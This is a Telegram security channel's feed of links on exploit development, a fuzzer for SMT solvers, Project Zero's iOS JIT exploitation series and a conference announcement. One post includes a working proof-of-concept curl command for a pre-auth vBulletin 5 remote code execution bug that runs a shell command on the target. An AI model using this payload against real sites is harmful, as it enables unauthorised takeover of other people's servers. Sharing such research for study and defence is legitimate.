r0 Crew (Channel)
8.83K subscribers
35 photos
1 video
9 files
1.98K links
Security Related Links:
- Reverse Engineering;
- Malware Research;
- Exploit Development;
- Pentest;
- etc;

Join to chat: @r0crew_bot πŸ‘ˆ

Forum: https://forum.reverse4you.org
Twitter: https://twitter.com/R0_Crew
Download Telegram
A new pre-auth 0day RCE exploit for vBulletin 5:

https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/

POC: curl -s http://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#web #expdev #rce #0day #darw1n
Friends, we have good news! πŸ”₯

OFFZONE 2021 is an international practical cybersecurity conference taking place in Moscow, Russia on April 22-23.

No suits, no business β€” only hardcore research.

Save the date! See you at OFFZONE 2021!
Storm - a blackbox mutational fuzzer for detecting critical bugs in SMT solvers Article: https://numairmansur.github.io/STORM.pdf Code: https://github.com/Practical-Formal-Methods/storm #fuzzing #dukeBarman
This three-part series highlights the technical challenges involved in finding and exploiting JavaScript engine vulnerabilities in modern web browsers and evaluates current exploit mitigation technologies. The exploited vulnerability, CVE-2020-9802, was fixed in iOS 13.5, while two of the mitigation bypasses, CVE-2020-9870 and CVE-2020-9910, were fixed in iOS 13.6.

JITSploitation I: A JIT Bug
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-one.html

JITSploitation II: Getting Read/Write
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-two.html

JITSploitation III: Subverting Control Flow
https://googleprojectzero.blogspot.com/2020/09/jitsploitation-three.html

#mobile #ios #javascript #browser #jit #webkit #expdev #cve #reverse #darw1n